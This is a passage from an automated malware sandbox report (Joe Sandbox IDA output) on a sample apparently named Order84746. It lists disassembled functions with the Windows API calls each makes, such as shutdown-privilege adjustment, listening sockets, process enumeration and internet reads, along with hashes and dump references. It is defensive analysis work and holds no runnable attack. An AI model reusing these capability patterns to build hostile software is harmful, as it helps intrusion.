                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0095038D
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009503AB
                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009503D6
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009503FF
                          • ShowWindow.USER32(00000003,00000000), ref: 00950421
                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00950440
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                          • String ID:
                          • API String ID: 2922825909-0
                          • Opcode ID: bcc754571d6599adae812b4b71892a6c4fea8a4d52e8a7b1878f22e026c95c10
                          • Instruction ID: 2069e748aea80222bca4405a78c5cb4c88496f4930dd7a04917046e6dc9bcfef
                          • Opcode Fuzzy Hash: bcc754571d6599adae812b4b71892a6c4fea8a4d52e8a7b1878f22e026c95c10
                          • Instruction Fuzzy Hash: 0BA1D031600616EFDB18CF69C9897BDBBB5FF88742F088119EC58A7290D774AD54CB90
                          Function 009279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                            • Part of subcall function 0091B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                            • Part of subcall function 0091B134: GetLastError.KERNEL32 ref: 0091B1BA
                          • ExitWindowsEx.USER32(?,00000000), ref: 00927A0F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          • Opcode ID: 68745a3ad23ba776feb5de9669096998737ffa9ce03bf7435bf9ff420bda83b6
                          • Instruction ID: 482041a5d8bb113833d04cdd895009298a38f76940883d3424828a9e1a08a987
                          • Opcode Fuzzy Hash: 68745a3ad23ba776feb5de9669096998737ffa9ce03bf7435bf9ff420bda83b6
                          • Instruction Fuzzy Hash: E401F77176D2326AF72816E8AC5BBBFB25C9B00360F140828F913B20D6D5A45E0081B4
                          Function 00938C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00938CA8
                          • WSAGetLastError.WS2_32(00000000), ref: 00938CB7
                          • bind.WS2_32(00000000,?,00000010), ref: 00938CD3
                          • listen.WS2_32(00000000,00000005), ref: 00938CE2
                          • WSAGetLastError.WS2_32(00000000), ref: 00938CFC
                          • closesocket.WS2_32(00000000), ref: 00938D10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          • Opcode ID: cde8ed9a725b3f86327bed10bfee8a11edc2bf6e51afeb712b13a04bbe17c85b
                          • Instruction ID: 959bfc7c9ca10c981a870551439fe19059588a14bcdfd310489c1725bcafa3ab
                          • Opcode Fuzzy Hash: cde8ed9a725b3f86327bed10bfee8a11edc2bf6e51afeb712b13a04bbe17c85b
                          • Instruction Fuzzy Hash: 1521B171600200AFCB10EF68D945B6EB7A9FF49710F108558F966A73D2CB70AD419B62
                          Function 00926532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00926554
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00926564
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00926583
                          • __wsplitpath.LIBCMT ref: 009265A7
                          • _wcscat.LIBCMT ref: 009265BA
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009265F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 4a45f2e11ed6ef927192df1f21c8fba97154a01ab7f9467e2e313f4b751fee84
                          • Instruction ID: 2d49e8bd775d21d605b3d2eb69961f6d9be85a51369a01b707fd2f4f4d91c15e
                          • Opcode Fuzzy Hash: 4a45f2e11ed6ef927192df1f21c8fba97154a01ab7f9467e2e313f4b751fee84
                          • Instruction Fuzzy Hash: 0B21A471904228AFDB10ABA4DC88FEEB7BCAB49300F5004A9F505E3145EBB59F85DB60
                          Function 0093923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0093A82C: inet_addr.WS2_32(00000000), ref: 0093A84E
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00939296
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 009392B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: cbd6ab6d26ae7bae0f6c6f0666900d5a49546fb99701f9754e4766370ef09e7c
                          • Instruction ID: 5ba4ddbfc846462bc3880757d1e2cedfc97061a4b30cf42c367b394104765a84
                          • Opcode Fuzzy Hash: cbd6ab6d26ae7bae0f6c6f0666900d5a49546fb99701f9754e4766370ef09e7c
                          • Instruction Fuzzy Hash: 1941A070600604AFDB10AB68C846E7E77EDEF44724F14444CFA66EB3D2DBB49D018BA2
                          Function 0092EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092EB8A
                          • _wcscmp.LIBCMT ref: 0092EBBA
                          • _wcscmp.LIBCMT ref: 0092EBCF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0092EBE0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0092EC0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          • Opcode ID: db8f9b5f0671d51b4dd424ce186d1cf27ba8e491c3c6c29c5bf265eea0faca7f
                          • Instruction ID: 0e1728ac2c0c0702da2ac7d3adb2abf0ebd2ad700c298d64ff246aad3db41cb7
                          • Opcode Fuzzy Hash: db8f9b5f0671d51b4dd424ce186d1cf27ba8e491c3c6c29c5bf265eea0faca7f
                          • Instruction Fuzzy Hash: ED41AD356046029FCB08DF68D4D1AAAB3E8FF49324F10455DFA6ACB3A1DB71A944CB91
                          Function 00948111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 207b20e5dc9916ab3b08b0d6f445cbff1de8ae3b5c7bc7cf04c4a2fa6974251d
                          • Instruction ID: ae4bae48a3b801644078a75f5fe8b522de45217521d797a673d2f064ed06fec8
                          • Opcode Fuzzy Hash: 207b20e5dc9916ab3b08b0d6f445cbff1de8ae3b5c7bc7cf04c4a2fa6974251d
                          • Instruction Fuzzy Hash: 6E11C1317092146FE7216F2ADC44E6FBB9DEF48760B05042EF84AD7281CF70E90286A5
                          Function 008E9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          • Opcode ID: b86ec5594739f4bf709efff0322cb36ee4e7f3b8b53ff9c9fdb475b79ecb53d5
                          • Instruction ID: 3e19f1f9db0910f692af8e1d93f938aa81038b0babec188ebbccff8924fbf26d
                          • Opcode Fuzzy Hash: b86ec5594739f4bf709efff0322cb36ee4e7f3b8b53ff9c9fdb475b79ecb53d5
                          • Instruction Fuzzy Hash: A792BCB1E0025ACBDF28CF59C8807BDB7B1FB55314F14819AE856EB280E771AD81CB91
                          Function 0094F1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • GetCursorPos.USER32(?), ref: 0094F211
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0095E4C0,?,?,?,?,?), ref: 0094F226
                          • GetCursorPos.USER32(?), ref: 0094F270
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0095E4C0,?,?,?), ref: 0094F2A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          • Opcode ID: 898c54aecd94bef99291ff7a888e74c3b1ea3b9021501edb53fdbba3c271f3d7
                          • Instruction ID: debc29b4f4f9e9fe7d79e0d48de3c91773eff1000244024ee7889742f0e0b2cb
                          • Opcode Fuzzy Hash: 898c54aecd94bef99291ff7a888e74c3b1ea3b9021501edb53fdbba3c271f3d7
                          • Instruction Fuzzy Hash: EF21B139601028EFDB258F94C868EFE7BB9FF0A310F084069F915872A1D3749D50EB90
                          Function 008FB55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 008FB5A5
                          • GetClientRect.USER32(?,?), ref: 0095E69A
                          • GetCursorPos.USER32(?), ref: 0095E6A4
                          • ScreenToClient.USER32(?,?), ref: 0095E6AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                          • String ID:
                          • API String ID: 1010295502-0
                          • Opcode ID: c54dbc24f1353d3763f0fa8a6db4149327a04cc30c28773f2f6b14b84121b3ed
                          • Instruction ID: 5a28fc6ccf2db5ccd1a22dfa1687c9579984239f735c467a873f5bb53944c372
                          • Opcode Fuzzy Hash: c54dbc24f1353d3763f0fa8a6db4149327a04cc30c28773f2f6b14b84121b3ed
                          • Instruction Fuzzy Hash: 30112231A0502EBFCB14DFA8C8899BE7BB8FB09309F000455FA52E6140D774AA95DBA1
                          Function 008FB11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008FB22F
                            • Part of subcall function 008FB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 008FB5A5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_$LongWindow
                          • String ID:
                          • API String ID: 1155049231-0
                          • Opcode ID: 090cccdadcbdd5c69cb557de5ce52e71349a66d7898eba7349b5a516457fc2f2
                          • Instruction ID: e90db38b7f8cd6430136f5ae4971100554c164eb8277e54f48ecf0fdfa1174f5
                          • Opcode Fuzzy Hash: 090cccdadcbdd5c69cb557de5ce52e71349a66d7898eba7349b5a516457fc2f2
                          • Instruction Fuzzy Hash: E1A1256011810DFADB2CAF3ADC98E7F395CFB86369F144119FA02D2592DB369D11A372
                          Function 00934EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009343BF,00000000), ref: 00934FA6
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00934FD2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          • Opcode ID: 8763830905227cdd452c7c2a04242f18b3fd504a40ee9f0d9cb9b941dc7af880
                          • Instruction ID: df1a72174c6eadd96caebac55646f113d7de50c7d91e72c0724603fe4590a041
                          • Opcode Fuzzy Hash: 8763830905227cdd452c7c2a04242f18b3fd504a40ee9f0d9cb9b941dc7af880
                          • Instruction Fuzzy Hash: 1441E771604609BFEB209E94CD85FBF77BCEB80758F15402EF205A6181DA75AE41DEA0
                          Function 0092E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092E20D
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0092E267
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0092E2B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: ede5fccf75652ed1e5958e897908c90313bc2646bace732b51103ac9f7f4c745
                          • Instruction ID: 5fc4fd4a260a71624f84252f91bfadf24c4cca9d79b7cdc1ba3a3eb5ebc91f96
                          • Opcode Fuzzy Hash: ede5fccf75652ed1e5958e897908c90313bc2646bace732b51103ac9f7f4c745
                          • Instruction Fuzzy Hash: 31216D35A10218EFCB00EFA9D884AADFBB8FF49310F0584AAE915EB351DB719905CB50
                          Function 0091B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                          • GetLastError.KERNEL32 ref: 0091B1BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          • Opcode ID: 5ca733f1d5cdfdfc5bcf984cb86477db3758101e3efe27cb3331086c2e9dd157
                          • Instruction ID: 61f329ec6a9b405c9cd28c7f6a0f37d68506bf4de8cfd2e80552b404dde3dffe
                          • Opcode Fuzzy Hash: 5ca733f1d5cdfdfc5bcf984cb86477db3758101e3efe27cb3331086c2e9dd157
                          • Instruction Fuzzy Hash: 7811C1B2A18209BFE7189F68DCC5D6BB7BDFF44310B21852EE55693241DB70FC818A60
                          Function 00926685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009266AF
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009266EC
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009266F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
